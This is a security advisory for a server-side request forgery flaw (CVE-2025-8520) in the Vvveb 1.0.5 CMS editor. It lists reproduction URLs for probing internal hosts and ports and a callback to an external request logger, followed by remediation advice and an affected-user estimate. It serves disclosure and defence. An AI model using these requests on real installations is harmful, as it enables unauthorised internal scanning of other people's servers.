DELTA OBSCURA

We are the team behind Mission Cyber Sentinel, a mission dedicated to securing 446,000 digital assets globally.

Our Partners

Vvveb - v1.0.5 - Server Side Request Forgery

By 0xhamy 03:31 AM - September 29th 2025
Type software
Product Environment web
Product Name Vvveb
Product Vendor Vvveb
Product Version 1.0.5
Product Link https://github.com/givanz/Vvveb
Vulnerability Name Server Side Request Forgery
Severity Medium
CVSS String
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L
CVSS Score 4.8
CVE ID CVE-2025-8520
Vendor Acknowledgement Yes
Affected digital Assets
268
Affected Users
26800
Date of Reporting Jan 03, 2025
PoC Exploit -
Credit 0xhamy

Description

The editor endpoint at
/vadmin123/?module=editor/editor&name=
accepts a user-supplied url parameter and will attempt to load that URL inside the drag-and-drop editor. An authenticated user with Editor (or equivalent) privileges can supply arbitrary URLs, causing the application to make requests to internal or external hosts. This can be abused for Server-Side Request Forgery (SSRF) and used to probe internal services (internal port scanning) by varying host/port combinations. The functionality is reachable from the regular “Design” / editor UI used to modify posts/pages.

Reproduce

Preconditions: an account with permissions to modify posts/pages (Editor role or equivalent).

  1. Log in as an editor and open the posts list:

    /vadmin123/index.php?module=content/posts&type=post

  2. Open any post in Design (drag-and-drop) mode. The editor URL will look similar to:

    http://127.0.0.1/vadmin123/?module=editor/editor&name=Etiam+leo+nibh...&url=//127.0.0.1/hello-world-4&template=content/post.html

    (the name value may be URL-encoded and long; it was shortened in testing to simplify URLs).

  3. Modify the url parameter to point at an internal/resource URL you want the server to fetch. Examples used during testing:

    • Load local webroot (port 80):

      http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/

    • Load a specific internal path:

      http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/page/contact

    • Probe an unused port (port scanning):

      http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:9999/

      — when the target port is closed you may see browser embedding errors, which indicate no service responded.

  4. To confirm the application actually performs requests, run a local HTTP listener (example):

    php -S 0.0.0.0:10001

    Then request:

    http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:10001/

    The PHP server will receive the request and log the incoming connection; the editor page will render an error or “not found” message returned by the target.

  5. You can also verify external callbacks by pointing url at an external request logger (e.g., webhook.site):

    http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//webhook.site/your-id

    The webhook service will show the incoming request and the editor will display the webhook’s response (or a “no default content configured” message).

  6. Repeat with different ports/hosts to enumerate reachable internal services (i.e., internal port scan).

Recommendation

  • Canonicalize & validate url: disallow non-whitelisted hosts and protocols (only allow known, internal content endpoints or logical template identifiers).
  • Block requests to private IP ranges and localhost from this feature (reject 127.0.0.0/8, 10.0.0.0/8, 192.168.0.0/16, 169.254.0.0/16, fc00::/7) unless explicitly required and access-controlled.
  • Restrict editor privileges & auditing: limit who can use the editor URL-loading feature, and log/alert on unusual url values.

How we calculate affected digital assets

Methodology

Digital assets affected by a piece of software or hardware can include installations and real-world usage of that product across servers, websites, IoT devices, and other connected systems.

Data sources we use

  • For many web technologies, we use BuiltWith to estimate how many websites currently use a given product. Example: Vvveb usage statistics on BuiltWith .
  • For products that include telemetry or licensing beacons, we may rely on vendor-reported deployment figures to estimate the number of active installations.

Example: a vendor might share that their firewall product is deployed across a certain number of customer networks or appliances (similar to how a vendor such as NetSweeper reports its deployment footprint). We use those deployment counts as a proxy for affected digital assets.

How we estimate affected users

Estimation

The affected users value is an estimate of how many people are likely exposed to the vulnerability through the impacted assets.

Inputs we consider

  • Vendor data: when available, we use user or deployment counts provided by the vendor (for example, via telemetry, analytics, or licensing systems).
  • Asset-based estimate: when vendor data is not available, we use a conservative baseline of 100 users per asset and multiply it by the number of affected assets.

Example calculation

Suppose a vulnerability affects:

  • 20 IoT devices
  • 40 servers
  • 40 websites

Total affected assets: 20 + 40 + 40 = 100
Using our conservative baseline of 100 users per asset:

Estimated affected users: 100 assets × 100 users = 10,000 users

This approach intentionally aims to be conservative; it gives us a consistent way to compare impact across vulnerabilities and understand the approximate number of users we help protect.